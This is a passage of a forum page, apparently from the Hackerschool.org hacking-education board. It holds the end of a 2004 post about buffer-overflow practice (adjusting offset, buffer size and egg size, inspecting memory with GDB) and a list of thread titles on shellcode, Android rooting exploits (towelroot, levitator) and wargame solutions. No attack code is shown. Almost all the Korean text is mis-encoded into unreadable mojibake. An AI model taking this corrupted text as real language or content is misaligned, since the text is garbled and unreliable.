offsetÀ̳ª buffer size , egg size Á¶ÀýÇؼ­ ¸Þ¸ð¸® º¸´Â ºÎºÐÀº Á÷Á¢Çغ¸¼¼¿ä.^^
»ý°¢À» Á¶±Ý ±í°Ô ÇÏ½Ã¸é ¸Þ¸ð¸®¸¦ Á÷Á¢ º¸Áö ¾Ê¾Æµµ ¾îµð µé¾î°¬´Âµ¥ ´ëÃæ Å뻤À¸·Î ¾Ë¼ö´Â ÀÖÁö¸¸.
±×·¸°Ô µÇ±â Àü±îÁö´Â GDB¸¦ ÀÌ¿ëÇϵçÁö Á÷Á¢ ÇÁ·Î±×·¥À» ¸¸µéµçÁö Çؼ­ ¸Þ¸ð¸®¸¦ º¸½Ã´Â ½À°üÀÌ ÁÁÀ»µí ÇÕ´Ï´Ù.
±×·³ Àü À̸¸... ¾Æ¸§´Ù¿î ÇÏ·ç º¸³»¼¼¿ä~

  Hit : 10037     Date : 2004/04/12 02:02



    
     [°øÁö] °­Á¸¦ ¿Ã¸®½Ç ¶§´Â ¸»¸Ó¸®¸¦ ´Þ¾ÆÁÖ¼¼¿ä^¤Ñ^ [29] ¸Û¸Û 02/27 18685
1580   °í¼ö´ÔµéÀÇ µµ¿òÀ» ¹Þ°í ½Í½À´Ï´Ù     vbnm111
02/11 140
1579   ¸®´ª½º Ä¿³Î 2.6 ¹öÀü ÀÌÈÄÀÇ LKM     jdo
07/25 649
1578   ½©ÄÚµå ¸ðÀ½     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/15 1460
1577   Call by value VS Call by Reference     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/15 850
1576   (²Ä¼ö) L.O.B Çѹ濡 Ŭ¸®¾îÇϱâ[2]     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/14 1166
1575   towelroot.c (zip) ÄÚ¸àÆÃ.[1]     scube
08/18 3696
1574   levitator.c (¾Èµå·ÎÀÌµå ·çÆÃ) °ø°Ý ºÐ¼® ¼Ò½º ÄÚµå °øÀ¯.[4]     scube
08/17 3616
1573   ¹«·á Á¤º¸º¸¾È ±â¼úÀÎÀç ¾ç¼º °úÁ¤ ±³À°»ý ¸ðÁý     chanjung111
06/17 4407
1572   K-Shield ÁִϾî 5±â ¸ðÁý     lrtk
06/17 4151
1571   [ÆÁ] ÆÄÀ̽ã 2¼Ò½º¸¦ 3À¸·Î º¯°æÇØÁÖ´Â »çÀÌÆ®[3]     ÇѽÂÀç
05/13 3845
1570   ±¸±Û ¹é¸µÅ© ÀÛ¾÷ Áú¹®¿ä     wkatnxka
03/30 3301
1569   [ÆÁ] ¿ìºÐÅõ ¹Ì·¯¸µ¼­¹ö     ÇѽÂÀç
03/09 3987
1568 ºñ¹Ð±ÛÀÔ´Ï´Ù  °¨À»¸øÀâ°Ú³×¿ä¤Ì¤Ì     À×À×À×
01/15 3
1567   µ¥ºñ¾È °è¿­ ¸®´ª½º ÀÇÁ¸¼º ±úÁ³À»¶§ ÇØ°á¹ý     ÇѽÂÀç
11/27 4462
1566   È«º¸ÇÕ´Ï´Ù. ½Å»ý º¸¾ÈÄ¿¹Â´ÏƼÀÔ´Ï´Ù.     kimwoojin0952
10/26 4196
1565   ½Å±âÇÑ ÇÁ·Î±×·¡¹Ö ¾ð¾î[3]     koreal33t
09/06 4593
1564   À©µµ¿ì,¸®´ª½º¿¡¼­ ³» ip¸¦ È®ÀÎÇØ º¸ÀÚ [1]     koreal33t
09/06 3794
1563   CTF »çÀÌÆ®[1]     koreal33t
09/06 4447
1562   ÀÚ°ÝÁõ (¹®Á¦)»çÀÌÆ® [2]     koreal33t
09/06 4263
1 [2][3][4][5][6][7][8][9][10]..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org